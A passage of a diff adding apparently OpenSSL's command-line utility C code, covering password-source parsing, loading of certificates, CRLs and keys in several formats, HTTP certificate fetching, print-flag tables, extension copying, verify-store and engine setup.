+    int i;
+    if (!strncmp(arg, "pass:", 5))
+        return BUF_strdup(arg + 5);
+    if (!strncmp(arg, "env:", 4)) {
+        tmp = getenv(arg + 4);
+        if (!tmp) {
+            BIO_printf(err, "Can't read environment variable %s\n", arg + 4);
+            return NULL;
+        }
+        return BUF_strdup(tmp);
+    }
+    if (!keepbio || !pwdbio) {
+        if (!strncmp(arg, "file:", 5)) {
+            pwdbio = BIO_new_file(arg + 5, "r");
+            if (!pwdbio) {
+                BIO_printf(err, "Can't open file %s\n", arg + 5);
+                return NULL;
+            }
+#if !defined(_WIN32)
+            /*
+             * Under _WIN32, which covers even Win64 and CE, file
+             * descriptors referenced by BIO_s_fd are not inherited
+             * by child process and therefore below is not an option.
+             * It could have been an option if bss_fd.c was operating
+             * on real Windows descriptors, such as those obtained
+             * with CreateFile.
+             */
+        } else if (!strncmp(arg, "fd:", 3)) {
+            BIO *btmp;
+            i = atoi(arg + 3);
+            if (i >= 0)
+                pwdbio = BIO_new_fd(i, BIO_NOCLOSE);
+            if ((i < 0) || !pwdbio) {
+                BIO_printf(err, "Can't access file descriptor %s\n", arg + 3);
+                return NULL;
+            }
+            /*
+             * Can't do BIO_gets on an fd BIO so add a buffering BIO
+             */
+            btmp = BIO_new(BIO_f_buffer());
+            pwdbio = BIO_push(btmp, pwdbio);
+#endif
+        } else if (!strcmp(arg, "stdin")) {
+            pwdbio = BIO_new_fp(stdin, BIO_NOCLOSE);
+            if (!pwdbio) {
+                BIO_printf(err, "Can't open BIO for stdin\n");
+                return NULL;
+            }
+        } else {
+            BIO_printf(err, "Invalid password argument \"%s\"\n", arg);
+            return NULL;
+        }
+    }
+    i = BIO_gets(pwdbio, tpass, APP_PASS_LEN);
+    if (keepbio != 1) {
+        BIO_free_all(pwdbio);
+        pwdbio = NULL;
+    }
+    if (i <= 0) {
+        BIO_printf(err, "Error reading password from BIO\n");
+        return NULL;
+    }
+    tmp = strchr(tpass, '\n');
+    if (tmp)
+        *tmp = 0;
+    return BUF_strdup(tpass);
+}
+
+int add_oid_section(BIO *err, CONF *conf)
+{
+    char *p;
+    STACK_OF(CONF_VALUE) *sktmp;
+    CONF_VALUE *cnf;
+    int i;
+    if (!(p = NCONF_get_string(conf, NULL, "oid_section"))) {
+        ERR_clear_error();
+        return 1;
+    }
+    if (!(sktmp = NCONF_get_section(conf, p))) {
+        BIO_printf(err, "problem loading oid section %s\n", p);
+        return 0;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(sktmp); i++) {
+        cnf = sk_CONF_VALUE_value(sktmp, i);
+        if (OBJ_create(cnf->value, cnf->name, cnf->name) == NID_undef) {
+            BIO_printf(err, "problem creating object %s=%s\n",
+                       cnf->name, cnf->value);
+            return 0;
+        }
+    }
+    return 1;
+}
+
+static int load_pkcs12(BIO *err, BIO *in, const char *desc,
+                       pem_password_cb *pem_cb, void *cb_data,
+                       EVP_PKEY **pkey, X509 **cert, STACK_OF(X509) **ca)
+{
+    const char *pass;
+    char tpass[PEM_BUFSIZE];
+    int len, ret = 0;
+    PKCS12 *p12;
+    p12 = d2i_PKCS12_bio(in, NULL);
+    if (p12 == NULL) {
+        BIO_printf(err, "Error loading PKCS12 file for %s\n", desc);
+        goto die;
+    }
+    /* See if an empty password will do */
+    if (PKCS12_verify_mac(p12, "", 0) || PKCS12_verify_mac(p12, NULL, 0))
+        pass = "";
+    else {
+        if (!pem_cb)
+            pem_cb = (pem_password_cb *)password_callback;
+        len = pem_cb(tpass, PEM_BUFSIZE, 0, cb_data);
+        if (len < 0) {
+            BIO_printf(err, "Passpharse callback error for %s\n", desc);
+            goto die;
+        }
+        if (len < PEM_BUFSIZE)
+            tpass[len] = 0;
+        if (!PKCS12_verify_mac(p12, tpass, len)) {
+            BIO_printf(err,
+                       "Mac verify error (wrong password?) in PKCS12 file for %s\n",
+                       desc);
+            goto die;
+        }
+        pass = tpass;
+    }
+    ret = PKCS12_parse(p12, pass, pkey, cert, ca);
+ die:
+    if (p12)
+        PKCS12_free(p12);
+    return ret;
+}
+
+int load_cert_crl_http(const char *url, BIO *err,
+                       X509 **pcert, X509_CRL **pcrl)
+{
+    char *host = NULL, *port = NULL, *path = NULL;
+    BIO *bio = NULL;
+    OCSP_REQ_CTX *rctx = NULL;
+    int use_ssl, rv = 0;
+    if (!OCSP_parse_url(url, &host, &port, &path, &use_ssl))
+        goto err;
+    if (use_ssl) {
+        if (err)
+            BIO_puts(err, "https not supported\n");
+        goto err;
+    }
+    bio = BIO_new_connect(host);
+    if (!bio || !BIO_set_conn_port(bio, port))
+        goto err;
+    rctx = OCSP_REQ_CTX_new(bio, 1024);
+    if (!rctx)
+        goto err;
+    if (!OCSP_REQ_CTX_http(rctx, "GET", path))
+        goto err;
+    if (!OCSP_REQ_CTX_add1_header(rctx, "Host", host))
+        goto err;
+    if (pcert) {
+        do {
+            rv = X509_http_nbio(rctx, pcert);
+        }
+        while (rv == -1);
+    } else {
+        do {
+            rv = X509_CRL_http_nbio(rctx, pcrl);
+        } while (rv == -1);
+    }
+
+ err:
+    if (host)
+        OPENSSL_free(host);
+    if (path)
+        OPENSSL_free(path);
+    if (port)
+        OPENSSL_free(port);
+    if (bio)
+        BIO_free_all(bio);
+    if (rctx)
+        OCSP_REQ_CTX_free(rctx);
+    if (rv != 1) {
+        if (bio && err)
+            BIO_printf(bio_err, "Error loading %s from %s\n",
+                       pcert ? "certificate" : "CRL", url);
+        ERR_print_errors(bio_err);
+    }
+    return rv;
+}
+
+X509 *load_cert(BIO *err, const char *file, int format,
+                const char *pass, ENGINE *e, const char *cert_descrip)
+{
+    X509 *x = NULL;
+    BIO *cert;
+
+    if (format == FORMAT_HTTP) {
+        load_cert_crl_http(file, err, &x, NULL);
+        return x;
+    }
+
+    if ((cert = BIO_new(BIO_s_file())) == NULL) {
+        ERR_print_errors(err);
+        goto end;
+    }
+
+    if (file == NULL) {
+#ifdef _IONBF
+# ifndef OPENSSL_NO_SETVBUF_IONBF
+        setvbuf(stdin, NULL, _IONBF, 0);
+# endif                         /* ndef OPENSSL_NO_SETVBUF_IONBF */
+#endif
+        BIO_set_fp(cert, stdin, BIO_NOCLOSE);
+    } else {
+        if (BIO_read_filename(cert, file) <= 0) {
+            BIO_printf(err, "Error opening %s %s\n", cert_descrip, file);
+            ERR_print_errors(err);
+            goto end;
+        }
+    }
+
+    if (format == FORMAT_ASN1)
+        x = d2i_X509_bio(cert, NULL);
+    else if (format == FORMAT_NETSCAPE) {
+        NETSCAPE_X509 *nx;
+        nx = ASN1_item_d2i_bio(ASN1_ITEM_rptr(NETSCAPE_X509), cert, NULL);
+        if (nx == NULL)
+            goto end;
+
+        if ((strncmp(NETSCAPE_CERT_HDR, (char *)nx->header->data,
+                     nx->header->length) != 0)) {
+            NETSCAPE_X509_free(nx);
+            BIO_printf(err, "Error reading header on certificate\n");
+            goto end;
+        }
+        x = nx->cert;
+        nx->cert = NULL;
+        NETSCAPE_X509_free(nx);
+    } else if (format == FORMAT_PEM)
+        x = PEM_read_bio_X509_AUX(cert, NULL,
+                                  (pem_password_cb *)password_callback, NULL);
+    else if (format == FORMAT_PKCS12) {
+        if (!load_pkcs12(err, cert, cert_descrip, NULL, NULL, NULL, &x, NULL))
+            goto end;
+    } else {
+        BIO_printf(err, "bad input format specified for %s\n", cert_descrip);
+        goto end;
+    }
+ end:
+    if (x == NULL) {
+        BIO_printf(err, "unable to load certificate\n");
+        ERR_print_errors(err);
+    }
+    if (cert != NULL)
+        BIO_free(cert);
+    return (x);
+}
+
+X509_CRL *load_crl(const char *infile, int format)
+{
+    X509_CRL *x = NULL;
+    BIO *in = NULL;
+
+    if (format == FORMAT_HTTP) {
+        load_cert_crl_http(infile, bio_err, NULL, &x);
+        return x;
+    }
+
+    in = BIO_new(BIO_s_file());
+    if (in == NULL) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (infile == NULL)
+        BIO_set_fp(in, stdin, BIO_NOCLOSE);
+    else {
+        if (BIO_read_filename(in, infile) <= 0) {
+            perror(infile);
+            goto end;
+        }
+    }
+    if (format == FORMAT_ASN1)
+        x = d2i_X509_CRL_bio(in, NULL);
+    else if (format == FORMAT_PEM)
+        x = PEM_read_bio_X509_CRL(in, NULL, NULL, NULL);
+    else {
+        BIO_printf(bio_err, "bad input format specified for input crl\n");
+        goto end;
+    }
+    if (x == NULL) {
+        BIO_printf(bio_err, "unable to load CRL\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+ end:
+    BIO_free(in);
+    return (x);
+}
+
+EVP_PKEY *load_key(BIO *err, const char *file, int format, int maybe_stdin,
+                   const char *pass, ENGINE *e, const char *key_descrip)
+{
+    BIO *key = NULL;
+    EVP_PKEY *pkey = NULL;
+    PW_CB_DATA cb_data;
+
+    cb_data.password = pass;
+    cb_data.prompt_info = file;
+
+    if (file == NULL && (!maybe_stdin || format == FORMAT_ENGINE)) {
+        BIO_printf(err, "no keyfile specified\n");
+        goto end;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    if (format == FORMAT_ENGINE) {
+        if (!e)
+            BIO_printf(err, "no engine specified\n");
+        else {
+            pkey = ENGINE_load_private_key(e, file, ui_method, &cb_data);
+            if (!pkey) {
+                BIO_printf(err, "cannot load %s from engine\n", key_descrip);
+                ERR_print_errors(err);
+            }
+        }
+        goto end;
+    }
+#endif
+    key = BIO_new(BIO_s_file());
+    if (key == NULL) {
+        ERR_print_errors(err);
+        goto end;
+    }
+    if (file == NULL && maybe_stdin) {
+#ifdef _IONBF
+# ifndef OPENSSL_NO_SETVBUF_IONBF
+        setvbuf(stdin, NULL, _IONBF, 0);
+# endif                         /* ndef OPENSSL_NO_SETVBUF_IONBF */
+#endif
+        BIO_set_fp(key, stdin, BIO_NOCLOSE);
+    } else if (BIO_read_filename(key, file) <= 0) {
+        BIO_printf(err, "Error opening %s %s\n", key_descrip, file);
+        ERR_print_errors(err);
+        goto end;
+    }
+    if (format == FORMAT_ASN1) {
+        pkey = d2i_PrivateKey_bio(key, NULL);
+    } else if (format == FORMAT_PEM) {
+        pkey = PEM_read_bio_PrivateKey(key, NULL,
+                                       (pem_password_cb *)password_callback,
+                                       &cb_data);
+    }
+#if !defined(OPENSSL_NO_RC4) && !defined(OPENSSL_NO_RSA)
+    else if (format == FORMAT_NETSCAPE || format == FORMAT_IISSGC)
+        pkey = load_netscape_key(err, key, file, key_descrip, format);
+#endif
+    else if (format == FORMAT_PKCS12) {
+        if (!load_pkcs12(err, key, key_descrip,
+                         (pem_password_cb *)password_callback, &cb_data,
+                         &pkey, NULL, NULL))
+            goto end;
+    }
+#if !defined(OPENSSL_NO_RSA) && !defined(OPENSSL_NO_DSA) && !defined (OPENSSL_NO_RC4)
+    else if (format == FORMAT_MSBLOB)
+        pkey = b2i_PrivateKey_bio(key);
+    else if (format == FORMAT_PVK)
+        pkey = b2i_PVK_bio(key, (pem_password_cb *)password_callback,
+                           &cb_data);
+#endif
+    else {
+        BIO_printf(err, "bad input format specified for key file\n");
+        goto end;
+    }
+ end:
+    if (key != NULL)
+        BIO_free(key);
+    if (pkey == NULL) {
+        BIO_printf(err, "unable to load %s\n", key_descrip);
+        ERR_print_errors(err);
+    }
+    return (pkey);
+}
+
+EVP_PKEY *load_pubkey(BIO *err, const char *file, int format, int maybe_stdin,
+                      const char *pass, ENGINE *e, const char *key_descrip)
+{
+    BIO *key = NULL;
+    EVP_PKEY *pkey = NULL;
+    PW_CB_DATA cb_data;
+
+    cb_data.password = pass;
+    cb_data.prompt_info = file;
+
+    if (file == NULL && (!maybe_stdin || format == FORMAT_ENGINE)) {
+        BIO_printf(err, "no keyfile specified\n");
+        goto end;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    if (format == FORMAT_ENGINE) {
+        if (!e)
+            BIO_printf(bio_err, "no engine specified\n");
+        else
+            pkey = ENGINE_load_public_key(e, file, ui_method, &cb_data);
+        goto end;
+    }
+#endif
+    key = BIO_new(BIO_s_file());
+    if (key == NULL) {
+        ERR_print_errors(err);
+        goto end;
+    }
+    if (file == NULL && maybe_stdin) {
+#ifdef _IONBF
+# ifndef OPENSSL_NO_SETVBUF_IONBF
+        setvbuf(stdin, NULL, _IONBF, 0);
+# endif                         /* ndef OPENSSL_NO_SETVBUF_IONBF */
+#endif
+        BIO_set_fp(key, stdin, BIO_NOCLOSE);
+    } else if (BIO_read_filename(key, file) <= 0) {
+        BIO_printf(err, "Error opening %s %s\n", key_descrip, file);
+        ERR_print_errors(err);
+        goto end;
+    }
+    if (format == FORMAT_ASN1) {
+        pkey = d2i_PUBKEY_bio(key, NULL);
+    }
+#ifndef OPENSSL_NO_RSA
+    else if (format == FORMAT_ASN1RSA) {
+        RSA *rsa;
+        rsa = d2i_RSAPublicKey_bio(key, NULL);
+        if (rsa) {
+            pkey = EVP_PKEY_new();
+            if (pkey)
+                EVP_PKEY_set1_RSA(pkey, rsa);
+            RSA_free(rsa);
+        } else
+            pkey = NULL;
+    } else if (format == FORMAT_PEMRSA) {
+        RSA *rsa;
+        rsa = PEM_read_bio_RSAPublicKey(key, NULL,
+                                        (pem_password_cb *)password_callback,
+                                        &cb_data);
+        if (rsa) {
+            pkey = EVP_PKEY_new();
+            if (pkey)
+                EVP_PKEY_set1_RSA(pkey, rsa);
+            RSA_free(rsa);
+        } else
+            pkey = NULL;
+    }
+#endif
+    else if (format == FORMAT_PEM) {
+        pkey = PEM_read_bio_PUBKEY(key, NULL,
+                                   (pem_password_cb *)password_callback,
+                                   &cb_data);
+    }
+#if !defined(OPENSSL_NO_RC4) && !defined(OPENSSL_NO_RSA)
+    else if (format == FORMAT_NETSCAPE || format == FORMAT_IISSGC)
+        pkey = load_netscape_key(err, key, file, key_descrip, format);
+#endif
+#if !defined(OPENSSL_NO_RSA) && !defined(OPENSSL_NO_DSA)
+    else if (format == FORMAT_MSBLOB)
+        pkey = b2i_PublicKey_bio(key);
+#endif
+    else {
+        BIO_printf(err, "bad input format specified for key file\n");
+        goto end;
+    }
+ end:
+    if (key != NULL)
+        BIO_free(key);
+    if (pkey == NULL)
+        BIO_printf(err, "unable to load %s\n", key_descrip);
+    return (pkey);
+}
+
+#if !defined(OPENSSL_NO_RC4) && !defined(OPENSSL_NO_RSA)
+static EVP_PKEY *load_netscape_key(BIO *err, BIO *key, const char *file,
+                                   const char *key_descrip, int format)
+{
+    EVP_PKEY *pkey;
+    BUF_MEM *buf;
+    RSA *rsa;
+    const unsigned char *p;
+    int size, i;
+
+    buf = BUF_MEM_new();
+    pkey = EVP_PKEY_new();
+    size = 0;
+    if (buf == NULL || pkey == NULL)
+        goto error;
+    for (;;) {
+        if (!BUF_MEM_grow_clean(buf, size + 1024 * 10))
+            goto error;
+        i = BIO_read(key, &(buf->data[size]), 1024 * 10);
+        size += i;
+        if (i == 0)
+            break;
+        if (i < 0) {
+            BIO_printf(err, "Error reading %s %s", key_descrip, file);
+            goto error;
+        }
+    }
+    p = (unsigned char *)buf->data;
+    rsa = d2i_RSA_NET(NULL, &p, (long)size, NULL,
+                      (format == FORMAT_IISSGC ? 1 : 0));
+    if (rsa == NULL)
+        goto error;
+    BUF_MEM_free(buf);
+    EVP_PKEY_set1_RSA(pkey, rsa);
+    return pkey;
+ error:
+    BUF_MEM_free(buf);
+    EVP_PKEY_free(pkey);
+    return NULL;
+}
+#endif                          /* ndef OPENSSL_NO_RC4 */
+
+static int load_certs_crls(BIO *err, const char *file, int format,
+                           const char *pass, ENGINE *e, const char *desc,
+                           STACK_OF(X509) **pcerts,
+                           STACK_OF(X509_CRL) **pcrls)
+{
+    int i;
+    BIO *bio;
+    STACK_OF(X509_INFO) *xis = NULL;
+    X509_INFO *xi;
+    PW_CB_DATA cb_data;
+    int rv = 0;
+
+    cb_data.password = pass;
+    cb_data.prompt_info = file;
+
+    if (format != FORMAT_PEM) {
+        BIO_printf(err, "bad input format specified for %s\n", desc);
+        return 0;
+    }
+
+    if (file == NULL)
+        bio = BIO_new_fp(stdin, BIO_NOCLOSE);
+    else
+        bio = BIO_new_file(file, "r");
+
+    if (bio == NULL) {
+        BIO_printf(err, "Error opening %s %s\n", desc, file ? file : "stdin");
+        ERR_print_errors(err);
+        return 0;
+    }
+
+    xis = PEM_X509_INFO_read_bio(bio, NULL,
+                                 (pem_password_cb *)password_callback,
+                                 &cb_data);
+
+    BIO_free(bio);
+
+    if (pcerts) {
+        *pcerts = sk_X509_new_null();
+        if (!*pcerts)
+            goto end;
+    }
+
+    if (pcrls) {
+        *pcrls = sk_X509_CRL_new_null();
+        if (!*pcrls)
+            goto end;
+    }
+
+    for (i = 0; i < sk_X509_INFO_num(xis); i++) {
+        xi = sk_X509_INFO_value(xis, i);
+        if (xi->x509 && pcerts) {
+            if (!sk_X509_push(*pcerts, xi->x509))
+                goto end;
+            xi->x509 = NULL;
+        }
+        if (xi->crl && pcrls) {
+            if (!sk_X509_CRL_push(*pcrls, xi->crl))
+                goto end;
+            xi->crl = NULL;
+        }
+    }
+
+    if (pcerts && sk_X509_num(*pcerts) > 0)
+        rv = 1;
+
+    if (pcrls && sk_X509_CRL_num(*pcrls) > 0)
+        rv = 1;
+
+ end:
+
+    if (xis)
+        sk_X509_INFO_pop_free(xis, X509_INFO_free);
+
+    if (rv == 0) {
+        if (pcerts) {
+            sk_X509_pop_free(*pcerts, X509_free);
+            *pcerts = NULL;
+        }
+        if (pcrls) {
+            sk_X509_CRL_pop_free(*pcrls, X509_CRL_free);
+            *pcrls = NULL;
+        }
+        BIO_printf(err, "unable to load %s\n",
+                   pcerts ? "certificates" : "CRLs");
+        ERR_print_errors(err);
+    }
+    return rv;
+}
+
+STACK_OF(X509) *load_certs(BIO *err, const char *file, int format,
+                           const char *pass, ENGINE *e, const char *desc)
+{
+    STACK_OF(X509) *certs;
+    if (!load_certs_crls(err, file, format, pass, e, desc, &certs, NULL))
+        return NULL;
+    return certs;
+}
+
+STACK_OF(X509_CRL) *load_crls(BIO *err, const char *file, int format,
+                              const char *pass, ENGINE *e, const char *desc)
+{
+    STACK_OF(X509_CRL) *crls;
+    if (!load_certs_crls(err, file, format, pass, e, desc, NULL, &crls))
+        return NULL;
+    return crls;
+}
+
+#define X509V3_EXT_UNKNOWN_MASK         (0xfL << 16)
+/* Return error for unknown extensions */
+#define X509V3_EXT_DEFAULT              0
+/* Print error for unknown extensions */
+#define X509V3_EXT_ERROR_UNKNOWN        (1L << 16)
+/* ASN1 parse unknown extensions */
+#define X509V3_EXT_PARSE_UNKNOWN        (2L << 16)
+/* BIO_dump unknown extensions */
+#define X509V3_EXT_DUMP_UNKNOWN         (3L << 16)
+
+#define X509_FLAG_CA (X509_FLAG_NO_ISSUER | X509_FLAG_NO_PUBKEY | \
+                         X509_FLAG_NO_HEADER | X509_FLAG_NO_VERSION)
+
+int set_cert_ex(unsigned long *flags, const char *arg)
+{
+    static const NAME_EX_TBL cert_tbl[] = {
+        {"compatible", X509_FLAG_COMPAT, 0xffffffffl},
+        {"ca_default", X509_FLAG_CA, 0xffffffffl},
+        {"no_header", X509_FLAG_NO_HEADER, 0},
+        {"no_version", X509_FLAG_NO_VERSION, 0},
+        {"no_serial", X509_FLAG_NO_SERIAL, 0},
+        {"no_signame", X509_FLAG_NO_SIGNAME, 0},
+        {"no_validity", X509_FLAG_NO_VALIDITY, 0},
+        {"no_subject", X509_FLAG_NO_SUBJECT, 0},
+        {"no_issuer", X509_FLAG_NO_ISSUER, 0},
+        {"no_pubkey", X509_FLAG_NO_PUBKEY, 0},
+        {"no_extensions", X509_FLAG_NO_EXTENSIONS, 0},
+        {"no_sigdump", X509_FLAG_NO_SIGDUMP, 0},
+        {"no_aux", X509_FLAG_NO_AUX, 0},
+        {"no_attributes", X509_FLAG_NO_ATTRIBUTES, 0},
+        {"ext_default", X509V3_EXT_DEFAULT, X509V3_EXT_UNKNOWN_MASK},
+        {"ext_error", X509V3_EXT_ERROR_UNKNOWN, X509V3_EXT_UNKNOWN_MASK},
+        {"ext_parse", X509V3_EXT_PARSE_UNKNOWN, X509V3_EXT_UNKNOWN_MASK},
+        {"ext_dump", X509V3_EXT_DUMP_UNKNOWN, X509V3_EXT_UNKNOWN_MASK},
+        {NULL, 0, 0}
+    };
+    return set_multi_opts(flags, arg, cert_tbl);
+}
+
+int set_name_ex(unsigned long *flags, const char *arg)
+{
+    static const NAME_EX_TBL ex_tbl[] = {
+        {"esc_2253", ASN1_STRFLGS_ESC_2253, 0},
+        {"esc_ctrl", ASN1_STRFLGS_ESC_CTRL, 0},
+        {"esc_msb", ASN1_STRFLGS_ESC_MSB, 0},
+        {"use_quote", ASN1_STRFLGS_ESC_QUOTE, 0},
+        {"utf8", ASN1_STRFLGS_UTF8_CONVERT, 0},
+        {"ignore_type", ASN1_STRFLGS_IGNORE_TYPE, 0},
+        {"show_type", ASN1_STRFLGS_SHOW_TYPE, 0},
+        {"dump_all", ASN1_STRFLGS_DUMP_ALL, 0},
+        {"dump_nostr", ASN1_STRFLGS_DUMP_UNKNOWN, 0},
+        {"dump_der", ASN1_STRFLGS_DUMP_DER, 0},
+        {"compat", XN_FLAG_COMPAT, 0xffffffffL},
+        {"sep_comma_plus", XN_FLAG_SEP_COMMA_PLUS, XN_FLAG_SEP_MASK},
+        {"sep_comma_plus_space", XN_FLAG_SEP_CPLUS_SPC, XN_FLAG_SEP_MASK},
+        {"sep_semi_plus_space", XN_FLAG_SEP_SPLUS_SPC, XN_FLAG_SEP_MASK},
+        {"sep_multiline", XN_FLAG_SEP_MULTILINE, XN_FLAG_SEP_MASK},
+        {"dn_rev", XN_FLAG_DN_REV, 0},
+        {"nofname", XN_FLAG_FN_NONE, XN_FLAG_FN_MASK},
+        {"sname", XN_FLAG_FN_SN, XN_FLAG_FN_MASK},
+        {"lname", XN_FLAG_FN_LN, XN_FLAG_FN_MASK},
+        {"align", XN_FLAG_FN_ALIGN, 0},
+        {"oid", XN_FLAG_FN_OID, XN_FLAG_FN_MASK},
+        {"space_eq", XN_FLAG_SPC_EQ, 0},
+        {"dump_unknown", XN_FLAG_DUMP_UNKNOWN_FIELDS, 0},
+        {"RFC2253", XN_FLAG_RFC2253, 0xffffffffL},
+        {"oneline", XN_FLAG_ONELINE, 0xffffffffL},
+        {"multiline", XN_FLAG_MULTILINE, 0xffffffffL},
+        {"ca_default", XN_FLAG_MULTILINE, 0xffffffffL},
+        {NULL, 0, 0}
+    };
+    return set_multi_opts(flags, arg, ex_tbl);
+}
+
+int set_ext_copy(int *copy_type, const char *arg)
+{
+    if (!strcasecmp(arg, "none"))
+        *copy_type = EXT_COPY_NONE;
+    else if (!strcasecmp(arg, "copy"))
+        *copy_type = EXT_COPY_ADD;
+    else if (!strcasecmp(arg, "copyall"))
+        *copy_type = EXT_COPY_ALL;
+    else
+        return 0;
+    return 1;
+}
+
+int copy_extensions(X509 *x, X509_REQ *req, int copy_type)
+{
+    STACK_OF(X509_EXTENSION) *exts = NULL;
+    X509_EXTENSION *ext, *tmpext;
+    ASN1_OBJECT *obj;
+    int i, idx, ret = 0;
+    if (!x || !req || (copy_type == EXT_COPY_NONE))
+        return 1;
+    exts = X509_REQ_get_extensions(req);
+
+    for (i = 0; i < sk_X509_EXTENSION_num(exts); i++) {
+        ext = sk_X509_EXTENSION_value(exts, i);
+        obj = X509_EXTENSION_get_object(ext);
+        idx = X509_get_ext_by_OBJ(x, obj, -1);
+        /* Does extension exist? */
+        if (idx != -1) {
+            /* If normal copy don't override existing extension */
+            if (copy_type == EXT_COPY_ADD)
+                continue;
+            /* Delete all extensions of same type */
+            do {
+                tmpext = X509_get_ext(x, idx);
+                X509_delete_ext(x, idx);
+                X509_EXTENSION_free(tmpext);
+                idx = X509_get_ext_by_OBJ(x, obj, -1);
+            } while (idx != -1);
+        }
+        if (!X509_add_ext(x, ext, -1))
+            goto end;
+    }
+
+    ret = 1;
+
+ end:
+
+    sk_X509_EXTENSION_pop_free(exts, X509_EXTENSION_free);
+
+    return ret;
+}
+
+static int set_multi_opts(unsigned long *flags, const char *arg,
+                          const NAME_EX_TBL * in_tbl)
+{
+    STACK_OF(CONF_VALUE) *vals;
+    CONF_VALUE *val;
+    int i, ret = 1;
+    if (!arg)
+        return 0;
+    vals = X509V3_parse_list(arg);
+    for (i = 0; i < sk_CONF_VALUE_num(vals); i++) {
+        val = sk_CONF_VALUE_value(vals, i);
+        if (!set_table_opts(flags, val->name, in_tbl))
+            ret = 0;
+    }
+    sk_CONF_VALUE_pop_free(vals, X509V3_conf_free);
+    return ret;
+}
+
+static int set_table_opts(unsigned long *flags, const char *arg,
+                          const NAME_EX_TBL * in_tbl)
+{
+    char c;
+    const NAME_EX_TBL *ptbl;
+    c = arg[0];
+
+    if (c == '-') {
+        c = 0;
+        arg++;
+    } else if (c == '+') {
+        c = 1;
+        arg++;
+    } else
+        c = 1;
+
+    for (ptbl = in_tbl; ptbl->name; ptbl++) {
+        if (!strcasecmp(arg, ptbl->name)) {
+            *flags &= ~ptbl->mask;
+            if (c)
+                *flags |= ptbl->flag;
+            else
+                *flags &= ~ptbl->flag;
+            return 1;
+        }
+    }
+    return 0;
+}
+
+void print_name(BIO *out, const char *title, X509_NAME *nm,
+                unsigned long lflags)
+{
+    char *buf;
+    char mline = 0;
+    int indent = 0;
+
+    if (title)
+        BIO_puts(out, title);
+    if ((lflags & XN_FLAG_SEP_MASK) == XN_FLAG_SEP_MULTILINE) {
+        mline = 1;
+        indent = 4;
+    }
+    if (lflags == XN_FLAG_COMPAT) {
+        buf = X509_NAME_oneline(nm, 0, 0);
+        BIO_puts(out, buf);
+        BIO_puts(out, "\n");
+        OPENSSL_free(buf);
+    } else {
+        if (mline)
+            BIO_puts(out, "\n");
+        X509_NAME_print_ex(out, nm, indent, lflags);
+        BIO_puts(out, "\n");
+    }
+}
+
+X509_STORE *setup_verify(BIO *bp, char *CAfile, char *CApath)
+{
+    X509_STORE *store;
+    X509_LOOKUP *lookup;
+    if (!(store = X509_STORE_new()))
+        goto end;
+    lookup = X509_STORE_add_lookup(store, X509_LOOKUP_file());
+    if (lookup == NULL)
+        goto end;
+    if (CAfile) {
+        if (!X509_LOOKUP_load_file(lookup, CAfile, X509_FILETYPE_PEM)) {
+            BIO_printf(bp, "Error loading file %s\n", CAfile);
+            goto end;
+        }
+    } else
+        X509_LOOKUP_load_file(lookup, NULL, X509_FILETYPE_DEFAULT);
+
+    lookup = X509_STORE_add_lookup(store, X509_LOOKUP_hash_dir());
+    if (lookup == NULL)
+        goto end;
+    if (CApath) {
+        if (!X509_LOOKUP_add_dir(lookup, CApath, X509_FILETYPE_PEM)) {
+            BIO_printf(bp, "Error loading directory %s\n", CApath);
+            goto end;
+        }
+    } else
+        X509_LOOKUP_add_dir(lookup, NULL, X509_FILETYPE_DEFAULT);
+
+    ERR_clear_error();
+    return store;
+ end:
+    X509_STORE_free(store);
+    return NULL;
+}
+
+#ifndef OPENSSL_NO_ENGINE
+/* Try to load an engine in a shareable library */
+static ENGINE *try_load_engine(BIO *err, const char *engine, int debug)
+{
+    ENGINE *e = ENGINE_by_id("dynamic");
+    if (e) {
+        if (!ENGINE_ctrl_cmd_string(e, "SO_PATH", engine, 0)
+            || !ENGINE_ctrl_cmd_string(e, "LOAD", NULL, 0)) {
+            ENGINE_free(e);
+            e = NULL;
+        }
+    }
+    return e;
+}
+
+ENGINE *setup_engine(BIO *err, const char *engine, int debug)
+{
+    ENGINE *e = NULL;
+
+    if (engine) {
+        if (strcmp(engine, "auto") == 0) {
+            BIO_printf(err, "enabling auto ENGINE support\n");
+            ENGINE_register_all_complete();
+            return NULL;
+        }
+        if ((e = ENGINE_by_id(engine)) == NULL
+            && (e = try_load_engine(err, engine, debug)) == NULL) {
+            BIO_printf(err, "invalid engine \"%s\"\n", engine);
+            ERR_print_errors(err);
+            return NULL;
+        }
+        if (debug) {
+            ENGINE_ctrl(e, ENGINE_CTRL_SET_LOGSTREAM, 0, err, 0);
+        }
+        ENGINE_ctrl_cmd(e, "SET_USER_INTERFACE", 0, ui_method, 0, 1);
+        if (!ENGINE_set_default(e, ENGINE_METHOD_ALL)) {
+            BIO_printf(err, "can't use that engine\n");
+            ERR_print_errors(err);
+            ENGINE_free(e);
+            return NULL;
+        }
+
+        BIO_printf(err, "engine \"%s\" set.\n", ENGINE_get_id(e));
+
+        /* Free our "structural" reference. */
+        ENGINE_free(e);
+    }
+    return e;
+}
+#endif
+
+int load_config(BIO *err, CONF *cnf)
+{
+    static int load_config_called = 0;
+    if (load_config_called)
+        return 1;
+    load_config_called = 1;
+    if (!cnf)
+        cnf = config;
+    if (!cnf)
+        return 1;
+
+    OPENSSL_load_builtin_modules();
+
+    if (CONF_modules_load(cnf, NULL, 0) <= 0) {
+        BIO_printf(err, "Error configuring OpenSSL\n");
+        ERR_print_errors(err);
+        return 0;
+    }
+    return 1;
+}
+
+char *make_config_name()
+{
+    const char *t = X509_get_default_cert_area();
+    size_t len;
+    char *p;
+
+    len = strlen(t) + strlen(OPENSSL_CONF) + 2;
+    p = OPENSSL_malloc(len);
+    if (p == NULL)
+        return NULL;
+    BUF_strlcpy(p, t, len);
+#ifndef OPENSSL_SYS_VMS
+    BUF_strlcat(p, "/", len);
+#endif
+    BUF_strlcat(p, OPENSSL_CONF, len);
+
+    return p;
+}
+
+static unsigned long index_serial_hash(const OPENSSL_CSTRING *a)
+{
+    const char *n;
+
+    n = a[DB_serial];
+    while (*n == '0')
+        n++;
+    return (lh_strhash(n));
+}
+
+static int index_serial_cmp(const OPENSSL_CSTRING *a,
+                            const OPENSSL_CSTRING *b)
+{
+    const char *aa, *bb;
+
+    for (aa = a[DB_serial]; *aa == '0'; aa++) ;
+    for (bb = b[DB_serial]; *bb == '0'; bb++) ;
